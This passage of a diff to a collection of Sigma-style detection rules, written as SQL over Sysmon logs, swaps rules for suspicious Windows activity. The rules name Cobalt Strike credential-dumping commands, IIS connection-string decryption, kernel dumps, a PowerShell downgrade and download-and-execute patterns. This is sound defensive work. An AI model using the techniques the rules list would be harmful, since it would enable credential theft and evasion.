'%LegalCopyright%' ESCAPE '\\'))" + "SELECT * FROM logs WHERE ((EventID = '1' AND Channel = 'Microsoft-Windows-Sysmon/Operational') AND (Image LIKE '%\\\\bcdedit.exe' ESCAPE '\\' OR OriginalFileName = 'bcdedit.exe') AND CommandLine LIKE '%set%' ESCAPE '\\' AND ((CommandLine LIKE '%bootstatuspolicy%' ESCAPE '\\' AND CommandLine LIKE '%ignoreallfailures%' ESCAPE '\\') OR (CommandLine LIKE '%recoveryenabled%' ESCAPE '\\' AND CommandLine LIKE '%no%' ESCAPE '\\')))" ], - "filename": "proc_creation_win_pua_rcedit_execution.yml" + "filename": "proc_creation_win_bcdedit_boot_conf_tamper.yml" }, { - "title": "Execution of Suspicious File Type Extension", - "id": "c09dad97-1c78-4f71-b127-7edb2b8e491a", - "status": "experimental", - "description": "Checks whether the image specified in a process creation event doesn't refer to an .exe file (caused by process ghosting or other unorthodox methods to start a process)", - "author": "Max Altgelt (Nextron Systems)", + "title": "PUA - RunXCmd Execution", + "id": 
"93199800-b52a-4dec-b762-75212c196542", + "status": "test", + "description": "Detects the use of the RunXCmd tool to execute commands with System or TrustedInstaller accounts", + "author": "Florian Roth (Nextron Systems)", "tags": [ - "attack.defense_evasion" + "attack.execution", + "attack.t1569.002", + "attack.s0029" ], "falsepositives": [ - "Unknown" + "Legitimate use by administrators" ], "level": "high", "rule": [ - "SELECT * FROM logs WHERE ((EventID = '1' AND Channel = 'Microsoft-Windows-Sysmon/Operational') AND NOT ((Image LIKE '%.exe' ESCAPE '\\' OR Image LIKE '%.tmp' ESCAPE '\\')) AND NOT ((Image = '') OR (Image IN ('System', 'Registry', 'MemCompression', 'vmmem')) OR (Image IN ('-', '')) OR (Image LIKE 'C:\\\\Windows\\\\Installer\\\\MSI%' ESCAPE '\\') OR ((ParentImage LIKE 'C:\\\\ProgramData\\\\Avira\\\\%' ESCAPE '\\' OR ParentImage LIKE 'C:\\\\Windows\\\\System32\\\\DriverStore\\\\FileRepository\\\\%' ESCAPE '\\')) OR (Image LIKE '%.scr' ESCAPE '\\') OR (Image LIKE '%NVIDIA\\\\NvBackend\\\\%' ESCAPE '\\' AND Image LIKE '%.dat' ESCAPE '\\') OR ((Image LIKE 'C:\\\\Windows\\\\System32\\\\%' ESCAPE '\\' OR Image LIKE 'C:\\\\Windows\\\\SysWOW64\\\\%' ESCAPE '\\') AND Image LIKE '%.com' ESCAPE '\\') OR (Image LIKE '%\\\\WinSCP.com' ESCAPE '\\') OR (Image LIKE '%C:\\\\Users\\\\%' ESCAPE '\\' AND Image LIKE '%\\\\AppData\\\\%' ESCAPE '\\' AND Image LIKE '%.tmp%' ESCAPE '\\' AND Image LIKE '%CodeSetup%' ESCAPE '\\') OR (Image LIKE '%\\\\program\\\\soffice.bin' ESCAPE '\\') OR ((Image LIKE 'C:\\\\Program Files\\\\EMC NetWorker\\\\Management\\\\GST\\\\apache\\\\cgi-bin\\\\update\\_jnlp.cgi' ESCAPE '\\' OR Image LIKE 'C:\\\\Program Files (x86)\\\\EMC NetWorker\\\\Management\\\\GST\\\\apache\\\\cgi-bin\\\\update\\_jnlp.cgi' ESCAPE '\\')) OR ((Image LIKE 'C:\\\\Program Files (x86)\\\\WINPAKPRO\\\\%' ESCAPE '\\' OR Image LIKE 'C:\\\\Program Files\\\\WINPAKPRO\\\\%' ESCAPE '\\') AND Image LIKE '%.ngn' ESCAPE '\\') OR ((Image LIKE 'C:\\\\Program Files 
(x86)\\\\MyQ\\\\Server\\\\pcltool.dll' ESCAPE '\\' OR Image LIKE 'C:\\\\Program Files\\\\MyQ\\\\Server\\\\pcltool.dll' ESCAPE '\\')) OR ((Image LIKE 'C:\\\\Program Files\\\\Microsoft Visual Studio\\\\%' ESCAPE '\\' OR Image LIKE 'C:\\\\Program Files (x86)\\\\Microsoft Visual Studio%' ESCAPE '\\') AND Image LIKE '%.com' ESCAPE '\\') OR (Image LIKE 'C:\\\\Config.Msi\\\\%' ESCAPE '\\' AND (Image LIKE '%.rbf' ESCAPE '\\' OR Image LIKE '%.rbs' ESCAPE '\\')) OR (Image LIKE '%\\\\AppData\\\\Local\\\\Packages\\\\%' ESCAPE '\\' AND Image LIKE '%\\\\LocalState\\\\rootfs\\\\%' ESCAPE '\\') OR (Image LIKE '%\\\\LZMA\\_EXE' ESCAPE '\\') OR (ParentImage LIKE 'C:\\\\Windows\\\\Temp\\\\%' ESCAPE '\\' AND Image LIKE 'C:\\\\Windows\\\\Temp\\\\Helper\\\\%' ESCAPE '\\') OR (ParentImage LIKE 'C:\\\\Windows\\\\Temp\\\\%' ESCAPE '\\' AND ParentImage LIKE '%\\\\TBT\\_Dock\\_Firmware\\\\GetDockVer32W.exe' ESCAPE '\\') OR (Image LIKE 'C:\\\\Program Files\\\\Mozilla Firefox\\\\tobedeleted\\\\%' ESCAPE '\\')))" + "SELECT * FROM logs WHERE (EventID = '1' AND Channel = 'Microsoft-Windows-Sysmon/Operational' AND (CommandLine LIKE '% /account=system %' ESCAPE '\\' OR CommandLine LIKE '% /account=ti %' ESCAPE '\\') AND CommandLine LIKE '%/exec=%' ESCAPE '\\')" ], - "filename": "proc_creation_win_susp_non_exe_image.yml" + "filename": "proc_creation_win_pua_runxcmd.yml" }, { - "title": "Winnti Pipemon Characteristics", - "id": "73d70463-75c9-4258-92c6-17500fe972f2", - "status": "stable", - "description": "Detects specific process characteristics of Winnti Pipemon malware reported by ESET", - "author": "Florian Roth (Nextron Systems), oscd.community", - "tags": [ - "attack.defense_evasion", - "attack.t1574.002", - "attack.g0044" - ], + "title": "Suspicious Kernel Dump Using Dtrace", + "id": "7124aebe-4cd7-4ccb-8df0-6d6b93c96795", + "status": "test", + "description": "Detects suspicious way to dump the kernel on Windows systems using dtrace.exe, which is available on Windows systems since Windows 10 
19H1", + "author": "Florian Roth (Nextron Systems)", "falsepositives": [ - "Legitimate setups that use similar flags" + "Unknown" ], - "level": "critical", + "level": "high", "rule": [ - "SELECT * FROM logs WHERE ((EventID = '1' AND Channel = 'Microsoft-Windows-Sysmon/Operational') AND (CommandLine LIKE '%setup0.exe -p%' ESCAPE '\\' OR (CommandLine LIKE '%setup.exe%' ESCAPE '\\' AND (CommandLine LIKE '%-x:0' ESCAPE '\\' OR CommandLine LIKE '%-x:1' ESCAPE '\\' OR CommandLine LIKE '%-x:2' ESCAPE '\\'))))" + "SELECT * FROM logs WHERE ((EventID = '1' AND Channel = 'Microsoft-Windows-Sysmon/Operational') AND ((Image LIKE '%\\\\dtrace.exe' ESCAPE '\\' AND CommandLine LIKE '%lkd(0)%' ESCAPE '\\') OR (CommandLine LIKE '%syscall:::return%' ESCAPE '\\' AND CommandLine LIKE '%lkd(%' ESCAPE '\\')))" ], - "filename": "proc_creation_win_apt_winnti_pipemon.yml" + "filename": "proc_creation_win_dtrace_kernel_dump.yml" }, { - "title": "Potential Configuration And Service Reconnaissance Via Reg.EXE", - "id": "970007b7-ce32-49d0-a4a4-fbef016950bd", + "title": "Imports Registry Key From an ADS", + "id": "0b80ade5-6997-4b1d-99a1-71701778ea61", "status": "test", - "description": "Detects the usage of \"reg.exe\" in order to query reconnaissance information from the registry. 
Adversaries may interact with the Windows registry to gather information about credentials, the system, configuration, and installed software.", - "author": "Timur Zinniatullin, oscd.community", + "description": "Detects the import of a alternate datastream to the registry with regedit.exe.", + "author": "Oddvar Moe, Sander Wiebing, oscd.community", "tags": [ - "attack.discovery", - "attack.t1012", - "attack.t1007" + "attack.t1112", + "attack.defense_evasion" ], "falsepositives": [ "Unknown" ], - "level": "medium", + "level": "high", "rule": [ - "SELECT * FROM logs WHERE ((EventID = '1' AND Channel = 'Microsoft-Windows-Sysmon/Operational') AND (Image LIKE '%\\\\reg.exe' ESCAPE '\\' OR OriginalFileName = 'reg.exe') AND CommandLine LIKE '%query%' ESCAPE '\\' AND (CommandLine LIKE '%currentVersion\\\\windows%' ESCAPE '\\' OR CommandLine LIKE '%winlogon\\\\%' ESCAPE '\\' OR CommandLine LIKE '%currentVersion\\\\shellServiceObjectDelayLoad%' ESCAPE '\\' OR CommandLine LIKE '%currentVersion\\\\run%' ESCAPE '\\' OR CommandLine LIKE '%currentVersion\\\\policies\\\\explorer\\\\run%' ESCAPE '\\' OR CommandLine LIKE '%currentcontrolset\\\\services%' ESCAPE '\\'))" + "SELECT * FROM logs WHERE ((EventID = '1' AND Channel = 'Microsoft-Windows-Sysmon/Operational') AND ((Image LIKE '%\\\\regedit.exe' ESCAPE '\\' OR OriginalFileName = 'REGEDIT.EXE') AND ((CommandLine LIKE '% /i %' ESCAPE '\\' OR CommandLine LIKE '%.reg%' ESCAPE '\\') AND CommandLine REGEXP ':[^ \\\\]')) AND NOT ((CommandLine LIKE '% /e %' ESCAPE '\\' OR CommandLine LIKE '% /a %' ESCAPE '\\' OR CommandLine LIKE '% /c %' ESCAPE '\\' OR CommandLine LIKE '% -e %' ESCAPE '\\' OR CommandLine LIKE '% -a %' ESCAPE '\\' OR CommandLine LIKE '% -c %' ESCAPE '\\')))" ], - "filename": "proc_creation_win_reg_query_registry.yml" + "filename": "proc_creation_win_regedit_import_keys_ads.yml" }, { - "title": "Dllhost.EXE Execution Anomaly", - "id": "e7888eb1-13b0-4616-bd99-4bc0c2b054b9", - "status": "experimental", - "description": 
"Detects a \"dllhost\" process spawning with no commandline arguments which is very rare to happen and could indicate process injection activity or malware mimicking similar system processes.", - "author": "Nasreddine Bencherchali (Nextron Systems)", + "title": "Potential PowerShell Downgrade Attack", + "id": "b3512211-c67e-4707-bedc-66efc7848863", + "status": "test", + "description": "Detects PowerShell downgrade attack by comparing the host versions with the actually used engine version 2.0", + "author": "Harish Segar (rule)", "tags": [ "attack.defense_evasion", - "attack.t1055" + "attack.execution", + "attack.t1059.001" ], "falsepositives": [ - "Unlikely" + "Unknown" ], - "level": "high", + "level": "medium", "rule": [ - "SELECT * FROM logs WHERE (EventID = '1' AND Channel = 'Microsoft-Windows-Sysmon/Operational' AND CommandLine LIKE '%dllhost.exe' ESCAPE '\\' AND Image LIKE '%\\\\dllhost.exe' ESCAPE '\\')" + "SELECT * FROM logs WHERE (EventID = '1' AND Channel = 'Microsoft-Windows-Sysmon/Operational' AND Image LIKE '%\\\\powershell.exe' ESCAPE '\\' AND (CommandLine LIKE '% -version 2 %' ESCAPE '\\' OR CommandLine LIKE '% -versio 2 %' ESCAPE '\\' OR CommandLine LIKE '% -versi 2 %' ESCAPE '\\' OR CommandLine LIKE '% -vers 2 %' ESCAPE '\\' OR CommandLine LIKE '% -ver 2 %' ESCAPE '\\' OR CommandLine LIKE '% -ve 2 %' ESCAPE '\\' OR CommandLine LIKE '% -v 2 %' ESCAPE '\\'))" ], - "filename": "proc_creation_win_dllhost_no_cli_execution.yml" + "filename": "proc_creation_win_powershell_downgrade_attack.yml" }, { - "title": "Suspicious Rundll32 Invoking Inline VBScript", - "id": "1cc50f3f-1fc8-4acf-b2e9-6f172e1fdebd", + "title": "Suspicious Desktopimgdownldr Command", + "id": "bb58aa4a-b80b-415a-a2c0-2f65a4c81009", "status": "test", - "description": "Detects suspicious process related to rundll32 based on command line that invokes inline VBScript as seen being used by UNC2452", + "description": "Detects a suspicious Microsoft desktopimgdownldr execution with parameters 
used to download files from the Internet", "author": "Florian Roth (Nextron Systems)", "tags": [ - "attack.defense_evasion", - "attack.t1055" + "attack.command_and_control", + "attack.t1105" ], "falsepositives": [ - "Unknown" + "False positives depend on scripts and administrative tools used in the monitored environment" ], "level": "high", "rule": [ - "SELECT * FROM logs WHERE (EventID = '1' AND Channel = 'Microsoft-Windows-Sysmon/Operational' AND CommandLine LIKE '%rundll32.exe%' ESCAPE '\\' AND CommandLine LIKE '%Execute%' ESCAPE '\\' AND CommandLine LIKE '%RegRead%' ESCAPE '\\' AND CommandLine LIKE '%window.close%' ESCAPE '\\')" + "SELECT * FROM logs WHERE ((EventID = '1' AND Channel = 'Microsoft-Windows-Sysmon/Operational') AND ((CommandLine LIKE '% /lockscreenurl:%' ESCAPE '\\' AND NOT ((CommandLine LIKE '%.jpg%' ESCAPE '\\' OR CommandLine LIKE '%.jpeg%' ESCAPE '\\' OR CommandLine LIKE '%.png%' ESCAPE '\\'))) OR (CommandLine LIKE '%reg delete%' ESCAPE '\\' AND CommandLine LIKE '%\\\\PersonalizationCSP%' ESCAPE '\\')))" ], - "filename": "proc_creation_win_rundll32_inline_vbs.yml" + "filename": "proc_creation_win_desktopimgdownldr_susp_execution.yml" }, { - "title": "Conhost.exe CommandLine Path Traversal", - "id": "ee5e119b-1f75-4b34-add8-3be976961e39", - "status": "experimental", - "description": "detects the usage of path traversal in conhost.exe indicating possible command/argument confusion/hijacking", - "author": "Nasreddine Bencherchali (Nextron Systems)", + "title": "TropicTrooper Campaign November 2018", + "id": "8c7090c3-e0a0-4944-bd08-08c3a0cecf79", + "status": "stable", + "description": "Detects TropicTrooper activity, an actor who targeted high-profile organizations in the energy and food and beverage sectors in Asia", + "author": "@41thexplorer, Microsoft Defender ATP", "tags": [ "attack.execution", - "attack.t1059.003" - ], - "falsepositives": [ - "Unlikely" + "attack.t1059.001" ], "level": "high", "rule": [ - "SELECT * FROM logs WHERE (EventID = 
'1' AND Channel = 'Microsoft-Windows-Sysmon/Operational' AND ParentCommandLine LIKE '%conhost%' ESCAPE '\\' AND CommandLine LIKE '%/../../%' ESCAPE '\\')" + "SELECT * FROM logs WHERE (EventID = '1' AND Channel = 'Microsoft-Windows-Sysmon/Operational' AND CommandLine LIKE '%abCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCc%' ESCAPE '\\')" ], - "filename": "proc_creation_win_conhost_path_traversal.yml" + "filename": "proc_creation_win_apt_tropictrooper.yml" }, { - "title": "Regedit as Trusted Installer", - "id": "883835a7-df45-43e4-bf1d-4268768afda4", - "status": "test", - "description": "Detects a regedit started with TrustedInstaller privileges or by ProcessHacker.exe", - "author": "Florian Roth (Nextron Systems)", + "title": "VsCode Child Process Anomaly", + "id": "5a3164f2-b373-4152-93cf-090b13c12d27", + "status": "experimental", + "description": "Detects uncommon or suspicious child processes spawning from a VsCode \"code.exe\" process. This could indicate an attempt of persistence via VsCode tasks or terminal profiles.", + "author": "Nasreddine Bencherchali (Nextron Systems)", "tags": [ - "attack.privilege_escalation", - "attack.t1548" + "attack.execution", + "attack.defense_evasion", + "attack.t1218", + "attack.t1202" ], "falsepositives": [ - "Unlikely" + "In development environment where VsCode is used heavily. False positives may occur when developers use task to compile or execute different types of code. 
Remove or add processes accordingly" ], - "level": "high", + "level": "medium", "rule": [ - "SELECT * FROM logs WHERE (EventID = '1' AND Channel = 'Microsoft-Windows-Sysmon/Operational' AND Image LIKE '%\\\\regedit.exe' ESCAPE '\\' AND (ParentImage LIKE '%\\\\TrustedInstaller.exe' ESCAPE '\\' OR ParentImage LIKE '%\\\\ProcessHacker.exe' ESCAPE '\\'))" + "SELECT * FROM logs WHERE ((EventID = '1' AND Channel = 'Microsoft-Windows-Sysmon/Operational') AND ParentImage LIKE '%\\\\code.exe' ESCAPE '\\' AND ((Image LIKE '%\\\\calc.exe' ESCAPE '\\' OR Image LIKE '%\\\\regsvr32.exe' ESCAPE '\\' OR Image LIKE '%\\\\rundll32.exe' ESCAPE '\\' OR Image LIKE '%\\\\cscript.exe' ESCAPE '\\' OR Image LIKE '%\\\\wscript.exe' ESCAPE '\\') OR ((Image LIKE '%\\\\powershell.exe' ESCAPE '\\' OR Image LIKE '%\\\\pwsh.exe' ESCAPE '\\' OR Image LIKE '%\\\\cmd.exe' ESCAPE '\\') AND (CommandLine LIKE '%Invoke-Expressions%' ESCAPE '\\' OR CommandLine LIKE '%IEX%' ESCAPE '\\' OR CommandLine LIKE '%Invoke-Command%' ESCAPE '\\' OR CommandLine LIKE '%ICM%' ESCAPE '\\' OR CommandLine LIKE '%DownloadString%' ESCAPE '\\' OR CommandLine LIKE '%rundll32%' ESCAPE '\\' OR CommandLine LIKE '%regsvr32%' ESCAPE '\\' OR CommandLine LIKE '%wscript%' ESCAPE '\\' OR CommandLine LIKE '%cscript%' ESCAPE '\\')) OR (Image LIKE '%C:\\\\Users\\\\Public\\\\%' ESCAPE '\\' OR Image LIKE '%C:\\\\Windows\\\\Temp\\\\%' ESCAPE '\\' OR Image LIKE '%C:\\\\Temp\\\\%' ESCAPE '\\')))" ], - "filename": "proc_creation_win_regedit_trustedinstaller.yml" + "filename": "proc_creation_win_vscode_child_processes_anomalies.yml" }, { - "title": "LOLBAS Data Exfiltration by DataSvcUtil.exe", - "id": "e290b10b-1023-4452-a4a9-eb31a9013b3a", + "title": "PowerShell Script Run in AppData", + "id": "ac175779-025a-4f12-98b0-acdaeb77ea85", "status": "experimental", - "description": "Detects when a user performs data exfiltration by using DataSvcUtil.exe", - "author": "Ialle Teixeira @teixeira0xfffff, Austin Songer @austinsonger", + "description": 
"Detects a suspicious command line execution that invokes PowerShell with reference to an AppData folder", + "author": "Florian Roth (Nextron Systems), Jonhnathan Ribeiro, oscd.community", "tags": [ - "attack.exfiltration", - "attack.t1567" + "attack.execution", + "attack.t1059.001" ], "falsepositives": [ - "DataSvcUtil.exe being used may be performed by a system administrator.", - "Verify whether the user identity, user agent, and/or hostname should be making changes in your environment.", - "DataSvcUtil.exe being executed from unfamiliar users should be investigated. If known behavior is causing false positives, it can be exempted from the rule." + "Administrative scripts" ], "level": "medium", "rule": [ - "SELECT * FROM logs WHERE ((EventID = '1' AND Channel = 'Microsoft-Windows-Sysmon/Operational') AND (CommandLine LIKE '%/in:%' ESCAPE '\\' OR CommandLine LIKE '%/out:%' ESCAPE '\\' OR CommandLine LIKE '%/uri:%' ESCAPE '\\') AND (Image LIKE '%\\\\DataSvcUtil.exe' ESCAPE '\\' OR OriginalFileName = 'DataSvcUtil.exe'))" + "SELECT * FROM logs WHERE (EventID = '1' AND Channel = 'Microsoft-Windows-Sysmon/Operational' AND (CommandLine LIKE '%powershell.exe%' ESCAPE '\\' OR CommandLine LIKE '%\\\\powershell%' ESCAPE '\\' OR CommandLine LIKE '%\\\\pwsh%' ESCAPE '\\' OR CommandLine LIKE '%pwsh.exe%' ESCAPE '\\') AND CommandLine LIKE '%/c %' ESCAPE '\\' AND CommandLine LIKE '%\\\\AppData\\\\%' ESCAPE '\\' AND (CommandLine LIKE '%Local\\\\%' ESCAPE '\\' OR CommandLine LIKE '%Roaming\\\\%' ESCAPE '\\'))" ], - "filename": "proc_creation_win_lolbin_data_exfiltration_by_using_datasvcutil.yml" + "filename": "proc_creation_win_powershell_susp_ps_appdata.yml" }, { - "title": "Operator Bloopers Cobalt Strike Commands", - "id": "647c7b9e-d784-4fda-b9a0-45c565a7b729", + "title": "Microsoft IIS Connection Strings Decryption", + "id": "97dbf6e2-e436-44d8-abee-4261b24d3e41", "status": "experimental", - "description": "Detects use of Cobalt Strike commands accidentally entered in the CMD 
shell", - "author": "_pete_0, TheDFIRReport", + "description": "Detects use of aspnet_regiis to decrypt Microsoft IIS connection strings. An attacker with Microsoft IIS web server access via a webshell or alike can decrypt and dump any hardcoded connection strings, such as the MSSQL service account password using aspnet_regiis command.", + "author": "Tim Rauch", "tags": [ - "attack.execution", - "attack.t1059.003" + "attack.credential_access", + "attack.t1003" ], "falsepositives": [ "Unknown" ], "level": "high", "rule": [ - "SELECT * FROM logs WHERE ((EventID = '1' AND Channel = 'Microsoft-Windows-Sysmon/Operational') AND (OriginalFileName = 'Cmd.Exe' OR Image LIKE '%\\\\cmd.exe' ESCAPE '\\') AND ((CommandLine LIKE 'cmd %' ESCAPE '\\' OR CommandLine LIKE 'cmd.exe%' ESCAPE '\\' OR CommandLine LIKE 'c:\\\\windows\\\\system32\\\\cmd.exe%' ESCAPE '\\') AND (CommandLine LIKE '%psinject%' ESCAPE '\\' OR CommandLine LIKE '%spawnas%' ESCAPE '\\' OR CommandLine LIKE '%make\\_token%' ESCAPE '\\' OR CommandLine LIKE '%remote-exec%' ESCAPE '\\' OR CommandLine LIKE '%rev2self%' ESCAPE '\\' OR CommandLine LIKE '%dcsync%' ESCAPE '\\' OR CommandLine LIKE '%logonpasswords%' ESCAPE '\\' OR CommandLine LIKE '%execute-assembly%' ESCAPE '\\' OR CommandLine LIKE '%getsystem%' ESCAPE '\\')))" + "SELECT * FROM logs WHERE ((EventID = '1' AND Channel = 'Microsoft-Windows-Sysmon/Operational') AND (Image LIKE '%\\\\aspnet\\_regiis.exe' ESCAPE '\\' OR OriginalFileName LIKE 'aspnet\\_regiis.exe' ESCAPE '\\') AND (CommandLine LIKE '%connectionStrings%' ESCAPE '\\' AND CommandLine LIKE '% -pdf%' ESCAPE '\\'))" ], - "filename": "proc_creation_win_hktl_cobaltstrike_bloopers_cmd.yml" + "filename": "proc_creation_win_iis_connection_strings_decryption.yml" }, { - "title": "Raccine Uninstall", - "id": "a31eeaed-3fd5-478e-a8ba-e62c6b3f9ecc", - "status": "test", - "description": "Detects commands that indicate a Raccine removal from an end system. 
Raccine is a free ransomware protection tool.", - "author": "Florian Roth (Nextron Systems)", + "title": "Renamed BrowserCore.EXE Execution", + "id": "8a4519e8-e64a-40b6-ae85-ba8ad2177559", + "status": "experimental", + "description": "Detects process creation with a renamed BrowserCore.exe (used to extract Azure tokens)", + "author": "Max Altgelt (Nextron Systems)", "tags": [ - "attack.defense_evasion", - "attack.t1562.001" + "attack.t1528", + "attack.t1036.003" ], "falsepositives": [ - "Legitimate deinstallation by administrative staff" + "Unknown" ], "level": "high", "rule": [ - "SELECT * FROM logs WHERE ((EventID = '1' AND Channel = 'Microsoft-Windows-Sysmon/Operational') AND ((CommandLine LIKE '%taskkill %' ESCAPE '\\' AND CommandLine LIKE '%RaccineSettings.exe%' ESCAPE '\\') OR (CommandLine LIKE '%reg.exe%' ESCAPE '\\' AND CommandLine LIKE '%delete%' ESCAPE '\\' AND CommandLine LIKE '%Raccine Tray%' ESCAPE '\\') OR (CommandLine LIKE '%schtasks%' ESCAPE '\\' AND CommandLine LIKE '%/DELETE%' ESCAPE '\\' AND CommandLine LIKE '%Raccine Rules Updater%' ESCAPE '\\')))" + "SELECT * FROM logs WHERE ((EventID = '1' AND Channel = 'Microsoft-Windows-Sysmon/Operational') AND OriginalFileName = 'BrowserCore.exe' AND NOT ((Image LIKE '%\\\\BrowserCore.exe' ESCAPE '\\')))" ], - "filename": "proc_creation_win_susp_disable_raccine.yml" + "filename": "proc_creation_win_renamed_browsercore.yml" }, { - "title": "WmiPrvSE Spawned A Process", - "id": "d21374ff-f574-44a7-9998-4a8c8bf33d7d", - "status": "stable", - "description": "Detects wmiprvse spawning processes", - "author": "Roberto Rodriguez @Cyb3rWard0g", + "title": "WhoAmI as Parameter", + "id": "e9142d84-fbe0-401d-ac50-3e519fb00c89", + "status": "test", + "description": "Detects a suspicious process command line that uses whoami as first parameter (as e.g. 
used by EfsPotato)", + "author": "Florian Roth (Nextron Systems)", "tags": [ - "attack.execution", - "attack.t1047" + "attack.discovery", + "attack.t1033", + "car.2016-03-001" ], "falsepositives": [ "Unknown" ], - "level": "medium", + "level": "high", "rule": [ - "SELECT * FROM logs WHERE ((EventID = '1' AND Channel = 'Microsoft-Windows-Sysmon/Operational') AND ParentImage LIKE '%\\\\WmiPrvSe.exe' ESCAPE '\\' AND NOT ((LogonId IN ('0x3e7', 'null') OR (User LIKE '%AUTHORI%' ESCAPE '\\' OR User LIKE '%AUTORI%' ESCAPE '\\') OR (Image LIKE '%\\\\WmiPrvSE.exe' ESCAPE '\\' OR Image LIKE '%\\\\WerFault.exe' ESCAPE '\\')) OR (LogonId = '')))" + "SELECT * FROM logs WHERE (EventID = '1' AND Channel = 'Microsoft-Windows-Sysmon/Operational' AND CommandLine LIKE '%.exe whoami%' ESCAPE '\\')" ], - "filename": "proc_creation_win_wmiprvse_spawning_process.yml" + "filename": "proc_creation_win_susp_whoami_as_param.yml" }, { - "title": "Potential Suspicious Child Process Of 3CXDesktopApp", - "id": "63f3605b-979f-48c2-b7cc-7f90523fed88", + "title": "Suspicious Serv-U Process Pattern", + "id": "58f4ea09-0fc2-4520-ba18-b85c540b0eaf", "status": "experimental", - "description": "Detects potential suspicious child processes of \"3CXDesktopApp.exe\". 
Which could be related to the 3CXDesktopApp supply chain compromise", - "author": "Nasreddine Bencherchali (Nextron Systems)", + "description": "Detects a suspicious process pattern which could be a sign of an exploited Serv-U service", + "author": "Florian Roth (Nextron Systems)", "tags": [ - "attack.command_and_control", - "attack.execution", - "attack.t1218" + "attack.credential_access", + "attack.t1555", + "cve.2021.35211" ], "falsepositives": [ - "Unknown" + "Legitimate uses in which users or programs use the SSH service of Serv-U for remote command execution" ], "level": "high", "rule": [ - "SELECT * FROM logs WHERE (EventID = '1' AND Channel = 'Microsoft-Windows-Sysmon/Operational' AND ParentImage LIKE '%\\\\3CXDesktopApp.exe' ESCAPE '\\' AND (Image LIKE '%\\\\cmd.exe' ESCAPE '\\' OR Image LIKE '%\\\\cscript.exe' ESCAPE '\\' OR Image LIKE '%\\\\mshta.exe' ESCAPE '\\' OR Image LIKE '%\\\\powershell.exe' ESCAPE '\\' OR Image LIKE '%\\\\pwsh.exe' ESCAPE '\\' OR Image LIKE '%\\\\regsvr32.exe' ESCAPE '\\' OR Image LIKE '%\\\\rundll32.exe' ESCAPE '\\' OR Image LIKE '%\\\\wscript.exe' ESCAPE '\\'))" + "SELECT * FROM logs WHERE (EventID = '1' AND Channel = 'Microsoft-Windows-Sysmon/Operational' AND ParentImage LIKE '%\\\\Serv-U.exe' ESCAPE '\\' AND (Image LIKE '%\\\\cmd.exe' ESCAPE '\\' OR Image LIKE '%\\\\powershell.exe' ESCAPE '\\' OR Image LIKE '%\\\\pwsh.exe' ESCAPE '\\' OR Image LIKE '%\\\\wscript.exe' ESCAPE '\\' OR Image LIKE '%\\\\cscript.exe' ESCAPE '\\' OR Image LIKE '%\\\\sh.exe' ESCAPE '\\' OR Image LIKE '%\\\\bash.exe' ESCAPE '\\' OR Image LIKE '%\\\\schtasks.exe' ESCAPE '\\' OR Image LIKE '%\\\\regsvr32.exe' ESCAPE '\\' OR Image LIKE '%\\\\wmic.exe' ESCAPE '\\' OR Image LIKE '%\\\\mshta.exe' ESCAPE '\\' OR Image LIKE '%\\\\rundll32.exe' ESCAPE '\\' OR Image LIKE '%\\\\msiexec.exe' ESCAPE '\\' OR Image LIKE '%\\\\forfiles.exe' ESCAPE '\\' OR Image LIKE '%\\\\scriptrunner.exe' ESCAPE '\\'))" ], - "filename": 
"proc_creation_win_malware_3cx_compromise_susp_children.yml" + "filename": "proc_creation_win_servu_susp_child_process.yml" }, { - "title": "Modify Group Policy Settings", - "id": "ada4b0c4-758b-46ac-9033-9004613a150d", + "title": "Execute Pcwrun.EXE To Leverage Follina", + "id": "6004abd0-afa4-4557-ba90-49d172e0a299", "status": "experimental", - "description": "Detect malicious GPO modifications can be used to implement many other malicious behaviors.", - "author": "frack113", + "description": "Detects indirect command execution via Program Compatibility Assistant \"pcwrun.exe\" leveraging the follina (CVE-2022-30190) vulnerability", + "author": "Nasreddine Bencherchali (Nextron Systems)", "tags": [ "attack.defense_evasion", - "attack.privilege_escalation", - "attack.t1484.001" + "attack.t1218", + "attack.execution" ], "falsepositives": [ - "Legitimate use" + "Unlikely" ], - "level": "medium", + "level": "high", "rule": [ - "SELECT * FROM logs WHERE ((EventID = '1' AND Channel = 'Microsoft-Windows-Sysmon/Operational') AND (Image LIKE '%\\\\reg.exe' ESCAPE '\\' OR OriginalFileName = 'reg.exe') AND CommandLine LIKE '%\\\\SOFTWARE\\\\Policies\\\\Microsoft\\\\Windows\\\\System%' ESCAPE '\\' AND (CommandLine LIKE '%GroupPolicyRefreshTimeDC%' ESCAPE '\\' OR CommandLine LIKE '%GroupPolicyRefreshTimeOffsetDC%' ESCAPE '\\' OR CommandLine LIKE '%GroupPolicyRefreshTime%' ESCAPE '\\' OR CommandLine LIKE '%GroupPolicyRefreshTimeOffset%' ESCAPE '\\' OR CommandLine LIKE '%EnableSmartScreen%' ESCAPE '\\' OR CommandLine LIKE '%ShellSmartScreenLevel%' ESCAPE '\\'))" + "SELECT * FROM logs WHERE (EventID = '1' AND Channel = 'Microsoft-Windows-Sysmon/Operational' AND Image LIKE '%\\\\pcwrun.exe' ESCAPE '\\' AND CommandLine LIKE '%../%' ESCAPE '\\')" ], - "filename": "proc_creation_win_reg_modify_group_policy_settings.yml" + "filename": "proc_creation_win_lolbin_pcwrun_follina.yml" }, { - "title": "Run PowerShell Script from Redirected Input Stream", - "id": 
"c83bf4b5-cdf0-437c-90fa-43d734f7c476", + "title": "Start Windows Service Via Net.EXE", + "id": "2a072a96-a086-49fa-bcb5-15cc5a619093", "status": "test", - "description": "Detects PowerShell script execution via input stream redirect", - "author": "Moriarty Meng (idea), Anton Kutepov (rule), oscd.community", + "description": "Detects the usage of the \"net.exe\" command to start a service using the \"start\" flag", + "author": "Timur Zinniatullin, Daniil Yugoslavskiy, oscd.community", "tags": [ - "attack.defense_evasion", "attack.execution", - "attack.t1059" + "attack.t1569.002" ], "falsepositives": [ - "Unknown" + "Legitimate administrator or user executes a service for legitimate reasons." ], - "level": "high", + "level": "low", "rule": [ - "SELECT * FROM logs WHERE (EventID = '1' AND Channel = 'Microsoft-Windows-Sysmon/Operational' AND (Image LIKE '%\\\\powershell.exe' ESCAPE '\\' OR Image LIKE '%\\\\pwsh.exe' ESCAPE '\\') AND CommandLine REGEXP '\\s-\\s*<')" + "SELECT * FROM logs WHERE ((EventID = '1' AND Channel = 'Microsoft-Windows-Sysmon/Operational') AND ((Image LIKE '%\\\\net.exe' ESCAPE '\\' OR Image LIKE '%\\\\net1.exe' ESCAPE '\\') OR OriginalFileName IN ('net.exe', 'net1.exe')) 